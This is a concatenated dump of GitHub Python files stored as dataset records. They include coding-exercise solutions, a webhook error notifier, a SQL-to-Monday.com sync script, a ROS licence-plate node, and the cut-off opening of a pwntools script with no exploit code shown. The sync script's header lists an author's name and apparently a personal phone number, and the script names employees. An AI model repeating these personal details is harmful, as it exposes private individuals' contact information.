total_rate += bot.ratelimit.get(msg.from_user.id, 0)\n if msg.from_user.id != admin.userid and total_rate > commands.rate_threshold:\n bot.ratelimit[msg.from_user.id] = commands.rate_threshold + 60\n return ('[rate limit exceeded, please wait at least 1min before sending additional commands]', {})\n bot.ratelimit[msg.from_user.id] = total_rate\n\n res = ''\n rflags = {}\n for (func, args) in parts:\n buf, flags = forcetuple(func(bot, msg, buf if args is None else args, buf))\n if 'stderr' in flags: res += flags['stderr'] + '\\n'\n if 'parse_mode' in flags: rflags['parse_mode'] = flags['parse_mode']\n return (res + buf, rflags)\n","repo_name":"tckmn/kipfa","sub_path":"src/parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":2661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"34138270933","text":"#\n# @lc app=leetcode id=739 lang=python3\n#\n# [739] Daily Temperatures\n#\n# https://leetcode.com/problems/daily-temperatures/description/\n#\n# algorithms\n# Medium (60.04%)\n# Total Accepted: 76.7K\n# Total Submissions: 127.4K\n# Testcase Example: '[73,74,75,71,69,72,76,73]'\n#\n# \n# Given a list of daily temperatures T, return a list such that, for each day\n# in the input, tells you how many days you would have to wait until a warmer\n# temperature. If there is no future day for which this is possible, put 0\n# instead.\n# \n# For example, given the list of temperatures T = [73, 74, 75, 71, 69, 72, 76,\n# 73], your output should be [1, 1, 4, 2, 1, 1, 0, 0].\n# \n# \n# Note:\n# The length of temperatures will be in the range [1, 30000].\n# Each temperature will be an integer in the range [30, 100].\n# \n#\n\n# naive approach\n# def dailyTemperatures(self, T):\n# n = len(T)\n# res = [0]*n\n# for i in range(n):\n# for j in range(i+1, n):\n# if T[j] > T[i]:\n# res[i] = j-i\n# break\n# return res\n\nfrom collections import Counter\nfrom functools import reduce\nclass Solution:\n # def dailyTemperatures(self, T: List[int]) -> List[int]:\n\n def dailyTemperatures3(self, T):\n ans = [0] * len(T)\n stack = [] #indexes from hottest to coldest\n for i in range(len(T) - 1, -1, -1):\n while stack and T[i] >= T[stack[-1]]:\n stack.pop()\n if stack:\n print('update i=', i, 'stack=', stack)\n ans[i] = stack[-1] - i\n stack.append(i)\n print('i=', i, 'stack=', stack)\n return ans\n\n def dailyTemperatures2(self, T):\n n = len(T)\n res = [0]*n\n for i in range(n):\n for j in range(i+1, n):\n if T[j] > T[i]:\n res[i] = j-i\n break\n return res\n\n def dailyTemperatures(self, T):\n c = Counter(T)\n # print(c)\n s = sorted([[k, v] for k, v in c.items()])\n # print(s)\n for i in range(1, len(s)):\n # print(i)\n # print(s[i])\n s[i][1] += s[i-1][1]\n # print(s)\n percentile = dict(s)\n # print(percentile)\n n = len(T)\n res = [0] * n\n \n def method1(i):\n for j in range(i+1, n):\n if T[j] > T[i]:\n return j - i\n return 0\n d = {}\n for i in range(n):\n if T[i] not in d:\n d[T[i]] = [i]\n else:\n d[T[i]].append(i)\n # print(d)\n order = [x[0] for x in s]\n # print(order)\n def method2(i):\n min_ = float('inf')\n for j in range(order.index(T[i])+1, len(s)):\n # print('here')\n for idx in d[order[j]]:\n if idx > i:\n if idx < min_:\n min_ = idx\n if min_ < float('inf'):\n return min_ - i\n else:\n return 0\n cut = int(n*0.9)\n for i in range(n):\n if percentile[T[i]] < cut:\n res[i] = method1(i)\n else:\n res[i] = method2(i)\n return res\ns = Solution()\nT = [73, 74, 75, 71, 69, 72, 76, 73]\nprint(s.dailyTemperatures3(T))\n# print(s.dailyTemperatures(T) == s.dailyTemperatures2(T))\n# T = [34,80,80,34,34,80,80,80,80,34]\n\n# print(s.dailyTemperatures(T))\n\n\n\n\n# print(s.dailyTemperatures(T) == s.dailyTemperatures2(T))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"nickyfoto/lc","sub_path":"python/739.daily-temperatures.py","file_name":"739.daily-temperatures.py","file_ext":"py","file_size_in_byte":3551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"32915493674","text":"from threading import Timer\r\nimport requests, json, logging, falcon\r\n\r\nLOGGER = logging.getLogger()\r\nLOGGER.setLevel(\"INFO\")\r\n\r\nclass SpaceNotifier:\r\n def __init__(self, webhook, debounce_time = 10, env=\"stagging\", silent = 10):\r\n self.notifications = {}\r\n self.__debounce_time = debounce_time\r\n self.__webhook = webhook\r\n self.__env = env\r\n self.__silent = {}\r\n self.__silent_threshold = silent\r\n self.__silent_general = []\r\n \r\n def __getMessage(self, etl):\r\n notif_type = {}\r\n for type in self.notifications[etl]['message']: #check how many time each type error happened\r\n if type not in notif_type:\r\n notif_type[type] = 1\r\n else:\r\n notif_type[type] += 1\r\n message = f\"Error occured on {etl} *{self.__env}*, error: \"\r\n\r\n for type in notif_type:\r\n message = f\"{message}\\n\\t- {type} : {notif_type[type] if notif_type[type] < self.__silent_threshold else f'{self.__silent_threshold-1}++'} time(s) raised.\"\r\n\r\n if(notif_type[type] >= self.__silent_threshold): # if one of error equal or more than silent threshold, then add it to silenced alert\r\n if etl not in self.__silent:\r\n self.__silent[etl] = []\r\n \r\n self.__silent[etl].append(type)\r\n message = f\"{message} \\n\\t\\t- *Occured too often, will be silenced till restart!*\"\r\n \r\n return f\"{message}\\nFor more detail, please check ELK.\"\r\n\r\n def send(self, etl, message):\r\n job = {\r\n \"message\" : [message],\r\n \"thread\" : None,\r\n }\r\n \r\n\r\n if \"with-param\" in etl:\r\n uris = etl.split(\"?\")\r\n uri = uris[0]\r\n query_param = uris[1] # keep param -> send email maybe ?\r\n\r\n etl = uri\r\n\r\n if etl in self.__silent:\r\n if message in self.__silent[etl]:\r\n # if error is silenced, then do not do anything\r\n return\r\n\r\n if etl in self.notifications and 'thread' in self.notifications[etl]:\r\n # if etl already scheduled for alerting, then cancel and debounce\r\n self.notifications[etl]['thread'].cancel()\r\n \r\n job['message'] = self.notifications[etl]['message'] + job[\"message\"] # append eror message \r\n self.notifications[etl] = {} \r\n \r\n self.notifications[etl] = job\r\n\r\n def __debounce(etl, message):\r\n try:\r\n self.notifications[etl] = {}\r\n response = requests.post(self.__webhook, data=json.dumps({\"text\":message}))\r\n if response.status_code != 200:\r\n LOGGER.error(str(e))\r\n except Exception as e:\r\n LOGGER.error(str(e))\r\n\r\n self.notifications[etl]['thread'] = Timer(self.__debounce_time, __debounce,args=[etl, self.__getMessage(etl)] )\r\n self.notifications[etl]['thread'].start()\r\n\r\n\r\n\r\n def __getTypedMessage(self, type):\r\n etl_counts = {}\r\n for etl in self.notifications[type]['etls']: #check how many time each type error happened\r\n if etl not in etl_counts:\r\n etl_counts[etl] = 1\r\n else:\r\n etl_counts[etl] += 1\r\n\r\n message = f\"Error occured while doing *{type.upper()}* on *{self.__env}* : \"\r\n\r\n for etl in etl_counts:\r\n message = f\"{message}\\n\\t- {etl} : {etl_counts[etl] if etl_counts[etl] < self.__silent_threshold else f'{self.__silent_threshold-1}++'} time(s) raised.\"\r\n\r\n if(etl_counts[etl] >= self.__silent_threshold): # if one of error equal or more than silent threshold, then add it to silenced alert\r\n if etl not in self.__silent_general:\r\n self.__silent_general.append(etl)\r\n \r\n self.__silent_general.append(etl)\r\n message = f\"{message} \\n\\t\\t- *Occured too often, will be silenced till restart!*\"\r\n \r\n return f\"{message}\\nFor more detail, please check ELK.\"\r\n \r\n def sendTyped(self, etl, type=\"ETL\" , debounce = None):\r\n \"\"\"\r\n This function will debounce an error space alert. \r\n The error is categorized as two categories, ETL and Non-ETL (recoveries:red)\r\n If no input until debounce is expired then it'll send message to Space\r\n \"\"\"\r\n\r\n # remove unnecessary query parameter, take only endpoint\r\n uris = etl.split(\"?\") \r\n etl = uris[0]\r\n\r\n jobs = {\r\n \"etls\" : [etl],\r\n \"thread\" : None,\r\n }\r\n\r\n\r\n if etl in self.__silent_general:\r\n return # if silenced then do nothing\r\n \r\n if type in self.notifications and 'thread' in self.notifications[type]:\r\n # if already scheduled, then debounce (cancel and restart)\r\n self.notifications[type]['thread'].cancel()\r\n\r\n jobs['etls'].extend(self.notifications[type]['etls'])\r\n self.notifications[type] = {} \r\n \r\n self.notifications[type] = jobs\r\n\r\n def __debounce(type, message):\r\n try:\r\n self.notifications[type] = {}\r\n response = requests.post(self.__webhook, data=json.dumps({\"text\":message}))\r\n if response.status_code != 200:\r\n LOGGER.error(str(e))\r\n except Exception as e:\r\n LOGGER.error(str(e))\r\n\r\n self.notifications[type]['thread'] = Timer(self.__debounce_time if debounce == None else debounce, __debounce,args=[type, self.__getTypedMessage(type)] )\r\n self.notifications[type]['thread'].start()\r\n \r\n\r\nclass test(object):\r\n def on_post(self, req, resp):\r\n resp.status = falcon.HTTP_200\r\n data = {'status': 'unavailable service'}\r\n resp.body = json.dumps(data)\r\n\r\n def on_get(self, req, resp):\r\n resp.status = falcon.HTTP_200\r\n content = str(1/0)\r\n data = {'status': 'success', 'content': content, 'enum': '1'}\r\n resp.body = json.dumps(data)","repo_name":"rasyid-abe/etl_datamart","sub_path":"notification.py","file_name":"notification.py","file_ext":"py","file_size_in_byte":6118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"40350304065","text":"\"\"\"\nYou are given a set A and n other sets.\nYour job is to find whether set A is a strict superset of each of the N sets.\nPrint True, if A is a strict superset of each of the N sets. Otherwise, print False.\nA strict superset has at least one element that does not exist in its subset.\n\nExample\nSet ([1,3,4]) is a strict superset of set ([1,3]).\nSet ([1,3,4]) is not a strict superset of set ([1,3,4]).\nSet ([1,3,4]) is not a strict superset of set ([1,3,5]).\n\nInput Format\nThe first line contains the space separated elements of set A.\nThe second line contains integer n, the number of other sets.\nThe next n lines contains the space separated elements of the other sets.\n\nOutput Format\nPrint True if set A is a strict superset of all other N sets. Otherwise, print False.\n\nSample Input:\n1 2 3 4 5 6 7 8 9 10 11 12 23 45 84 78\n2\n1 2 3 4 5\n100 11 12\n\nSample Output:\nFalse\n\nExplanation:\nSet A is the strict superset of the set ([1,2,3,4,5]) but not of the set ([100,11,12]) because 100 is not in set A.\nHence, the output is False.\n\"\"\"\n\"\"\"\nExplanation of the solution code:\nIn Python, the > operator is used to check if a set is a strict superset of another set. \nIf all elements of the second set are in the first set, \nand the first set has at least one element that the second set doesn't have, \nA > B returns True. Otherwise, it returns False.\n\"\"\"\nA = set(map(int, input().split()))\nnum_other_sets = int(input())\n\nis_strict_superset = True\nfor _ in range(num_other_sets):\n other_set = set(map(int, input().split()))\n if not (A > other_set):\n is_strict_superset = False\n break\n\nprint(is_strict_superset)\n","repo_name":"CihatAcar/HackerRank-Python-Exercises","sub_path":"Sets/check_strict_superset.py","file_name":"check_strict_superset.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"17872540326","text":"# Вывести кол-во гласных букв в предложекние введеных пользователем.\nvowels = ['a', 'e', 'i', 'o', 'u'] # список гласных букв\nword = input(\"Provide a word to search for vowels: \") # запрос предложения, слова\nfound = {} # словарь\n\nfound['a'] = 0\nfound['e'] = 0\nfound['i'] = 0\nfound['o'] = 0\nfound['u'] = 0\n\nfor letter in word: # перебор букв в слове\n\tif letter in vowels: # если буква глассная\n\t\tfound[letter] += 1 # +1 буква\n\nfor k, v in sorted(found.items()): # ключ и значение \n\tprint(k, 'was found', v, 'time(s).') # буква ее кол-во\n","repo_name":"Lumaks42/codePythonStart","sub_path":"vowels_improvement.py","file_name":"vowels_improvement.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"38056070411","text":"class Solution:\n def isIsomorphic(self, s: str, t: str) -> bool:\n print(f\"{s} - {t}\")\n replacements = {}\n if len(s) != len(t):\n return False\n for s_char, t_char in zip(s, t):\n print(f\"{s_char} \", end=\"\")\n if s_char in replacements:\n print(f\"found replacement {replacements[s_char]}\")\n if replacements[s_char] != t_char:\n print(\"False\")\n return False\n else:\n if t_char not in replacements.values():\n print(f\"no replacement, adding {s_char}: {t_char}\")\n replacements[s_char] = t_char\n else:\n print(f\"{t_char} already used as replacement\")\n print(\"False\")\n return False\n print(\"True\")\n return True\n\n\ninputs = [(\"egg\", \"add\"), (\"badc\", \"baba\"), (\"foo\", \"bar\"), (\"bbbaaaba\", \"aaabbbba\")]\nexpected = [True, False, False, False]\n\nresults = []\nfor i in inputs:\n sol = Solution()\n results.append(sol.isIsomorphic(i[0], i[1]))\n\nprint(expected)\nprint(results)\nprint(expected == results) \n\n","repo_name":"woodroww/algorithms","sub_path":"leetcode/isomorphic_strings_205.py","file_name":"isomorphic_strings_205.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"4141631606","text":"#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\n# File : lmdb-single.py\n# Author : Jiayuan Mao\n# Email : maojiayuan@gmail.com\n# Date : 01/17/2023\n#\n# This file is part of Jacinle.\n# Distributed under terms of the MIT license.\n\nfrom jacinle.storage.kv.lmdb import LMDBKVStore\n\n\ndef main():\n kv = LMDBKVStore('/tmp/test_1.lmdb', readonly=False)\n\n with kv.transaction():\n kv['a'] = 1\n kv['b'] = 2\n\n assert 'a' in kv and kv['a'] == 1\n assert 'b' in kv and kv['b'] == 2\n assert 'c' not in kv\n\n for k in kv.keys():\n print(k, kv[k])\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"vacancy/Jacinle","sub_path":"examples/kv-lmdb/lmdb-single.py","file_name":"lmdb-single.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":122,"dataset":"github-code","pt":"16"} +{"seq_id":"22925740294","text":"# Monday and Local SQL server intagration\n# Written by: Anthony Bradt 613-986-0029\n# Requested by: Victoria Hurrell, Hated by: Christan Slain\n\nimport requests\nimport json\nimport pyodbc\nimport pandas as pd\nimport time\n\napiKey = \"XXX\"\napiUrl = \"https://api.monday.com/v2\"\nheaders = {\"Authorization\": apiKey}\n\ncnxn = pyodbc.connect(\"Driver={SQL Server Native Client 11.0};\"\n \"Server=XXX;\"\n \"Database=XXX;\"\n \"Trusted_Connection=yes;\")\n\n#Add SQL Read Query here: \n#SQLQR = \"SELECT\tstt.sttDescription as 'Status' ,ord.ordSchedShipDate ,ord.ordCustRequestDate as 'Production Completion'\t,sales.ordavValue as 'Designer'\t,ord.ordPONumber as 'Sales Order 3'\t,cust.venCompanyName as 'Customer Name',ord.ordDescription FROM dbo.Orders ord LEFT JOIN dbo.OrderStatuses stt on stt.sttID = ord.sttID LEFT JOIN dbo.OrderAttributeValues sales on sales.ordID = ord.ordID AND sales.atbID = 64 LEFT JOIN dbo.Organizations cust on cust.venID = ord.venID WHERE ord.ordCreatedDateTime > '2019-01-01' AND cust.vencompanyName NOT LIKE 'Test Customer' AND ord.ordPONumber NOT LIKE '0000%' AND sales.ordavValue = 'Heather Tardioli' \"\n\n#Must match Desingers names with Board ID\nDesigners = [\"Elnaz Shahrokhi\" ,\"Kaitlyn North\" ,\"Heather Tardioli\" ,\"Wael Bakr\" ,\"Aviva Ben-Choreen\" ,\"Janet Spencer\" ,\"Karley Scrivens\" ,\"Kimberly Silcox\" ,\"Ola Elmaghraby\" ,\"Sarah Clifford\" ,\"Victoria Campbell\" ,\"Caroline Castrucci\" ,\"Corey Laurysen\" ,\"Zeina Agha\", \"Jinan Al-Ani\"]\nBoardID = [\"840778743\" ,\"840784633\" ,\"840780676\" ,\"840788263\" ,\"701886327\" ,\"840782335\" ,\"840785291\" ,\"840786638\" ,\"840787425\" ,\"840792017\" ,\"840789036\" ,\"840785983\" ,\"845011609\" ,\"840791247\", \"840783457\"]\nStats = [\"Cancelled\",\"Shipped\",\"Completed\",\"Available for Confirmation\",\"Available to Schedule\",\"Blank5\",\"Confirmation Notification\",\"Copy\",\"Design Import\",\"In Production\",\"Invoiced\",\"Left CP\",\"PO Needed\",\"Scheduled\",\"Review for Scheduling\",\"Service Schedulable\",\"Ready to Ship\",\"Ready to Ship CP\",\"Material List Available\",\"Nested\",\"Left Carleton Place\"]\n#Hard coded Status, order matters very much, must match monday's side\nprint(len(Stats))\n\n\"\"\" \n'Cancelled', 'value': '{\"index\":0}'\n'Shipped', 'value': '{\"index\":1}'},\n'Completed', 'value': '{\"index\":2}'},\n'Available for Confirmation', 'value': '{\"index\":3}'}\n'Available to Schedule', 'value': '{\"index\":4}'},\n'Confirmation Notification', 'value': '{\"index\":6}'}\n'Copy', 'value': '{\"index\":7}'}\n'Design Import', 'value': '{\"index\":8}'},\n'In Production', 'value': '{\"index\":9}'}\n'Invoiced', 'value': '{\"index\":10}'},\n'Left CP', 'value': '{\"index\":11}'},\n'PO Needed', 'value': '{\"index\":12}'}\n'Scheduled', 'value': '{\"index\":13}'}\n'Review For Scheduling', 'value': '{\"index\":14}'}\n\"\"\"\n \ndef SQLRead(Des): #Pass Designer name to SQL, Return Full SQL read\n try:\n SQLQR = \"SELECT\tstt.sttDescription as 'Status' ,ord.ordSchedShipDate ,ord.ordCustRequestDate as 'Production Completion'\t,sales.ordavValue as 'Designer'\t,ord.ordPONumber as 'Sales Order 3'\t,cust.venCompanyName as 'Customer Name',ord.ordDescription, processor.ordavValue as 'Processor', ord.ordOrderDate FROM dbo.Orders ord LEFT JOIN dbo.OrderStatuses stt on stt.sttID = ord.sttID LEFT JOIN dbo.OrderAttributeValues sales on sales.ordID = ord.ordID AND sales.atbID = 64 LEFT JOIN dbo.OrderAttributeValues processor on processor.ordID = ord.ordID AND processor.atbID = 75 LEFT JOIN dbo.Organizations cust on cust.venID = ord.venID WHERE ord.ordCreatedDateTime > DATEADD(year,-1,GETDATE()) AND cust.vencompanyName NOT LIKE 'Test Customer' AND ord.ordpoNumber NOT LIKE '%-D' AND ord.ordPONumber NOT LIKE '0000%' AND sales.ordavValue = '\"\n SQLQR += Des\n SQLQR += \"'\"\n df = pd.read_sql(SQLQR, cnxn)\n return df\n except: #If Failed, Try again. Bandain for timeout SQL Requests\n print(\"SQL failed\")\n SQLRead(Des)\n \ndef STRClean(CleanME): #Removes Extra char on Strings\n CleanME = str(CleanME)\n CleanME = CleanME[2:-2]\n return CleanME\n \ndef CheckSTR(ID,Data): \n Data = str(Data)\n ID = str(ID)\n ID += '\"'\n #print(ID)\n if ID in Data:\n return 1\n else:\n return 0\n \ndef CheckSTROld(ID,Data):\n Data = str(Data)\n ID = str(ID)\n #print(ID)\n if ID in Data:\n return 1\n else:\n return 0\n\ndef MonQuery(BID): #Takes Monday Board ID, returns that boards items \n #'query {boards (ids: 695573207){items{name column_values{title id value}}}}'\n query = 'query {boards (ids:'\n query += BID\n query += '){items{name id column_values{title id value}}}}'\n data = {'query' : query}\n r = requests.post(url=apiUrl, json=data, headers=headers) # make request\n x = r.json()\n # print(r)\n return x\n\ndef SQLToMon(FullQ,SID,BID): #Takes SQL Data, breakes in into parts and passes it to Funtion WriteMon\n Status = FullQ['Status'] #Sperates each line item\n ShipDate = FullQ['ordSchedShipDate']\n ProdComp = FullQ['Production Completion']\n Design = FullQ['Designer']\n Item = FullQ['Customer Name']\n Descrip = FullQ['ordDescription']\n OrdDate = FullQ['ordOrderDate']\n Process = FullQ['Processor']\n Process = STRClean(Process.values) #Cleans each item \n Status = STRClean(Status.values)\n ShipDate = DateClean(ShipDate) #Dates and STR use diffrent Clean functions\n ProdComp = DateClean(ProdComp)\n OrdDate = DateClean(OrdDate)\n Design = STRClean(Design.values)\n Item = STRClean(Item.values)\n Descrip = STRClean(Descrip.values)\n print(Item,SID,Status,Descrip,ShipDate,ProdComp,Design,BID,OrdDate,Process)\n WriteMon(Item,SID,Status,Descrip,ShipDate,ProdComp,Design,BID,OrdDate,Process)\n return 0\n \ndef DateClean(Date):\n Date = str(Date)\n Date = Date.split(\"Name:\",1)[0]\n Date = Date[4:]\n Date = Date.replace(\" \",\"\")\n Date = Date.replace(\"\\n\",\"\")\n return Date\n\ndef WriteMon(Item,SID,Status,Descrip,ShipDate,ProdComp,Design,BID,OrdDate,Process):\n IID = MakeItem(BID,Item)\n IID = CleanID(str(IID))\n print(IID)\n ChangeItemValues(BID,IID,\"text_1\",DoubleDump(SID))\n ChangeItemValues(BID,IID,\"text\",DoubleDump(Descrip))\n ChangeItemValues(BID,IID,\"text7\",DoubleDump(Process))\n ChangeItemValues(BID,IID,\"text1\",DoubleDump(Design))\n ChangeItemValues(BID,IID,\"date\",DateDump(ProdComp))\n ChangeItemValues(BID,IID,\"date4\",DateDump(ShipDate))\n ChangeItemValues(BID,IID,\"date1\",DateDump(OrdDate))\n print(Status)\n for z in range(len(Stats)):\n if CheckSTROld(Stats[z],Status):\n ChangeItemValues(BID,IID,\"status\",StatDump(z))\n \n \n # ChangeItemValues(BID,IID,\n return 0\n \ndef StatDump(Value):\n VStat = '{\"index\":%s}'%(Value)\n VStat = json.dumps(VStat)\n return VStat\n \ndef DoubleDump(Value):\n Value = json.dumps(json.dumps(Value))\n return Value\n \ndef DateDump(Value):\n VDate = '{\"date\": \"%s\"}'%(Value)\n VDate = json.dumps(VDate)\n return VDate\n \ndef MakeItem(ID,Item):\n Item = str(Item)\n query = 'mutation { create_item (board_id:'\n query += ID\n query += ', group_id: \"topics\", item_name:\"'\n query += Item\n query += '\") { id } }'\n data = {'query' : query}\n r = requests.post(url=apiUrl, json=data, headers=headers) # make request\n print (r)\n return (r.json());\n # return r\n\ndef CleanID(NotCleanID):\n print(\"To be Cleaned:\" + NotCleanID)\n NotCleanID = NotCleanID.split(\"'id':\",1)[1]\n NotCleanID = NotCleanID.split(\"}}\",1)[0]\n NotCleanID = NotCleanID.replace(\"'\",\"\")\n NotCleanID = NotCleanID.replace(\" \",\"\")\n return NotCleanID\n \ndef CleanItemID(ItemID):\n ItemID = ItemID.split(\"'id':\",1)[1]\n ItemID = ItemID.split(\"'column_values':\",1)[0]\n ItemID = ItemID.replace(\"'\",\"\")\n ItemID = ItemID.replace(\",\",\"\")\n ItemID = ItemID.replace(\" \",\"\")\n return ItemID\n \n\"\"\"\ntext_1 - sales order#\ntext - Description\nstatus - Production status\ndate4 - Sched Ship date\ndate - Production completion\nperson - Desginers\n\"\"\"\n\ndef ChangeItemValues(BID,IID,CID,Value):\n try:\n print (\"Flag: 0\")\n query = str('mutation {change_column_value(board_id:%s, item_id:%s,column_id:\"%s\",value:%s){id}}'%(BID,IID,CID,Value))\n print (query)\n data = {'query' : query}\n print (\"Flag: 1\")\n r = requests.post(url=apiUrl, json=data, headers=headers, timeout=240) # make request\n print (\"Flag: 2\")\n return (r.json());\n except:\n print(\"failed\")\n print(BID)\n print(IID)\n print(CID)\n print(Value)\n\n\"\"\"\ndef FindWon(json_data):\n data_dict = dict(json_data)\n won_list = []\n if (\"data\" in data_dict.keys()):\n dict1 = data_dict[\"data\"]\n if (\"boards\" in dict1.keys()):\n for item in dict1[\"boards\"]:\n if (\"items\" in item.keys()):\n for i in item[\"items\"]:\n if (\"column_values\" in i.keys()):\n for ix in i[\"column_values\"]:\n if (\"value\" in ix.keys()):\n if (\"61557-D\" in ix[\"value\"]):\n won_list.append(i)\n return (won_list);\nprint(type(MonQuery(\"695573207\")))\nprint(FindWon(MonQuery(\"695573207\")))\n\"\"\"\n\nlvals = []\ndef rec_won(data,key,reg,depth): #Majic Sause, This burger aint the same without it. Credits:Kyle Lawrynuik \n flag = []\n new_flag = []\n global lvals\n if isinstance(data, dict):\n try:\n if (reg == str(data[key])):\n flag.append(depth)\n except KeyError as e:\n pass\n for element in data:\n for el in rec_won(data[element],key,reg,depth):\n flag.append(el)\n if isinstance(data, list):\n for element in data:\n for el in rec_won(element,key,reg,depth):\n flag.append((el))\n for element in flag:\n if(element>0):\n new_flag.append(element-1)\n if(element==0):\n #print(data)\n lvals.append(data)\n return new_flag\n\n\"\"\"\ninput(\"part 0 -- Testing \")\nlvals = []\ndata = MonQuery(\"695573207\")\nprint(type(data))\n#print(data)\nsalesOrderID = \"63020\"\nsalesOrderID = json.dumps(salesOrderID)\nrec_won(data=dict(data),key=\"value\",reg=salesOrderID,depth=2)\nprint(lvals)\n\n\"\"\"\n\n\n#Main \ninput(\"Part 1 -- Add missing items to monday\")\ncount = 0\nfor x in Designers: #Run through for each designer\n print(x)\n # input(\"Enter to continue\")\n time.sleep(60)\n df = SQLRead(x) #Runs preset SQL Query for the designers name \n print(df) #Prints SQL Query using pandas\n print(BoardID[count]) \n MonData = MonQuery(BoardID[count])#Takes hard coded desingers board ID and returns Monday Items \n print(MonData)\n \n for y in df.index:#For every item returned by the SQL Query\n time.sleep(1)\n TestDF = df.loc[[y]] #Pass just one item at a time\n print(TestDF)\n SalesDF = TestDF['Sales Order 3'] #Isolate Sales Order number\n SalesID = STRClean(SalesDF.values)#Clean Sales Order number\n print(SalesID)\n \n if CheckSTR(SalesID,MonData) == 0: #Check if Sales Order number is anywhere in the monday board\n print(\"passing SQL to Monday\")\n print(df.loc[y])\n SQLToMon(df.loc[[y]],SalesID,BoardID[count]) #Passes SQL item to be written to Monday.com \n \n else: #Item already exist in monday\n lvals = [] #Preforms the same as SQLToMon, should be a function of its own\n SalesID = json.dumps(SalesID)\n rec_won(data=dict(MonData),key=\"value\",reg=SalesID,depth=2)\n ItemID = CleanItemID(str(lvals))\n Status = TestDF['Status']\n Status = STRClean(Status.values)\n ProdDate = TestDF['Production Completion']\n SchedDate = TestDF['ordSchedShipDate']\n SchedDate = DateClean(SchedDate)\n ProdDate = DateClean(ProdDate)\n for z in range(len(Stats)):\n if CheckSTROld(Stats[z],Status):\n ChangeItemValues(BoardID[count],ItemID,\"status\",StatDump(z))\n ChangeItemValues(BoardID[count],ItemID,\"date\",DateDump(ProdDate))\n ChangeItemValues(BoardID[count],ItemID,\"date4\",DateDump(SchedDate))\n print(\"update\")\n print(StatDump(z)) \n \n count += 1\n \ninput(\"Finished\")\n","repo_name":"aajjbb613/Insight_to_Monday","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":12526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70886135047","text":"import setuptools\n\n# Открытие README.md и присвоение его long_description.\nwith open(\"README.md\", \"r\") as fh:\n\tlong_description = fh.read()\n\n# Определение requests как requirements для того, чтобы этот пакет работал. Зависимости проекта.\nrequirements = [\"requests<=2.21.0\", \"selenium\"]\n\n# Функция, которая принимает несколько аргументов. Она присваивает эти значения пакету.\nsetuptools.setup(\n\tname=\"dnevniklib\",\n\tversion=\"1.0\",\n\tauthor=\"Ivan Kriventsev\",\n\tauthor_email=\"dirtyhornet277@outlook.com\",\n\tdescription=\"Library for automated work with dnevnik.mos.ru\",\n\n\tlong_description=long_description,\n\tlong_description_content_type=\"text/markdown\",\n\turl=\"https://github.com/dirtyhornet277/dnevniklib\",\n\tpackages=setuptools.find_packages(),\n\tclassifiers=[\n\t],\n\tpython_requires='>=3.6',\n)\n","repo_name":"DnevnikLib/dnevniklib","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"ru","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"28516499015","text":"#!/usr/bin/env python3\n\n# import libraries\nimport rospy\nimport cv2\nimport numpy as np\nimport car_plate_number_test\nimport sensor_msgs\nfrom geometry_msgs.msg import PoseStamped\nfrom test_pkg.msg import CarData\nfrom cv_bridge import CvBridge\nimport cv2\n\nclass License_Detect:\n def __init__(self):\n print(\"Start\")\n rospy.init_node(\"car_plate_number\")\n rospy.Subscriber(\"/camera/rgb/image_raw\",sensor_msgs.msg.Image,self.ImageCallback)\n rospy.Subscriber('/move_base_simple/goal',PoseStamped,self.start)\n self.car_msg_pub = rospy.Publisher('/Car_Data',CarData,queue_size=1)\n self.image = None\n self.oldval = 0\n self.bridge = CvBridge()\n rospy.spin()\n \n def start(self,data):\n print(\"success\")\n car_number , img ,detected= car_plate_number_test.find_number()\n # print(car_number)\n\n carmsg = CarData()\n\n if detected:\n carmsg.car_number_plate = car_number\n carmsg.height = img.shape[0]\n carmsg.width = img.shape[1]\n carmsg.data = self.bridge.cv2_to_imgmsg(img).data\n carmsg.detected = detected\n self.car_msg_pub.publish(carmsg)\n else:\n carmsg.car_number_plate = \" \"\n carmsg.detected = detected\n\n self.car_msg_pub.publish(carmsg)\n\n\n# 집에 가고 싶다...\n\n def ImageCallback(self, data):\n # print(data.height) # value : 1080\n # print(data.width) # value : 1920\n # print(data.encoding) # value : rgb8\n # print(data.is_bigendian) # value : 0\n # print(data.step) # value : 5760\n bridge = CvBridge()\n # cv_image = bridge.imgmsg_to_cv2(image_message, desired_encoding='passthrough')\n img_ori = bridge.imgmsg_to_cv2(data,'bgr8')\n # print(img_ori.shape)\n self.image = cv2.resize(img_ori, (640, 480), interpolation=cv2.INTER_CUBIC)\n # self.image = img_ori.copy()\n # print(self.image[0][0]) # row : 1080 col : 1920\n # print(np.sum(self.image))\n cur = np.sum(self.image)\n print(cur - self.oldval if cur > self.oldval else 0)\n self.oldval = cur\n\n\n\n cv2.imshow(\"Image window\", self.image)\n cv2.waitKey(3)\n # print(car_plate_number_test.find_number(data))\n \n \nif __name__ ==\"__main__\":\n start = License_Detect()\n ","repo_name":"chunggilan/Autonomous-Multi-Robot-Parking-System","sub_path":"test_pkg/scripts/car_plate_ros.py","file_name":"car_plate_ros.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"} +{"seq_id":"27893530174","text":"#!/usr/bin/env python\n\nfrom pwn import *\n\ncontext.log_level = \"debug\"\n\nelf = 